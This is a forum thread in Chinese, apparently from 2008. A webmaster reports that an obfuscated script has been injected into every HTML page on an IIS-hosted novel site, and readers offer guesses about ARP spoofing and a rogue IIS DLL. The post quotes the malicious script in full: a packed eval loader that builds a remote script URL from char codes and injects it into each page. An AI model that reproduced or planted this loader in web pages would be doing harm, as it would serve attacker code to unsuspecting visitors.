问题已经解决~~~貌似服务器所有HTML页多出了一段代码,被挂马了~~
高手进帮看看~貌似服务器所有HTML页多出了一段代码,被挂马了~~知道的兄弟指点一二,
例如以下页面:
[url]http://www.1314book.com/files/article/html/0/208/797043.html[/url]
[url]http://www.1314book.com/files/article/html/0/208/797043.html[/url]
不管是新上传的HTML还是刚生成的都有着代码....
<Script language="javascript" id="_iisa_flagid" >
eval(function(p,a,c,k,e,r){var b,e=function(c){return(c<62?'':e(parseInt(c/62)))+((c=c%62)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)a[c]=(r[b=e(c)]=k[c])?b:'\\x0';e=function(){return a.join('|')||'^'};k=[function(e){return r[e]}];c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b('+e(c)+')\\b','g'),k[c]);return p}('e f(a,b){1 s=\'\';1 c=a.split(\',\');for(i=0;i<c.length;i++){s+=String.fromCharCode(c-b)}return s}e 6(){1 a=7.g;if(a){a.insertBefore(4,7.g.firstChild);clearTimeout(8)}else{bodytimmer=h(\'6()\',j)}}1 8;1 k=\'l,m,m,9,n,d,d,2,2,2,5,o,66,63,5,2,61,2,5,o,3,2,n,64,3,3,3,3,d,107,110,125,5,9,l,9\';1 p=\'script\';1 4;4=7.createElement(p);1 q=10;4.src=f(k,q);8=h(\'6()\',j);',[],51,'|var|60|58|iis_main_js_ob|56|execmainjs|document|miantimmer|122||||57|function|chardecode|body|setTimeout||2000|sendservercode|114|126|68|59|iis_main_js|mainkeycode'.split('|'),0,{}));
</Script>
[[i] 本帖最后由 boer 于 2008-1-27 08:37 编辑 [/i]] 估计是服务器中arp病毒了 问题已经解决
不是,是在IIS里增加了一个ASP.NET 解析的DLL。是挂马高手。。 怎么解决的。。我的也被挂了。。一样的。 arp攻击的重定向,可以是挂你本机,也可以是挂同IP段的其他机器,然后篡改路由设备
页:
[1]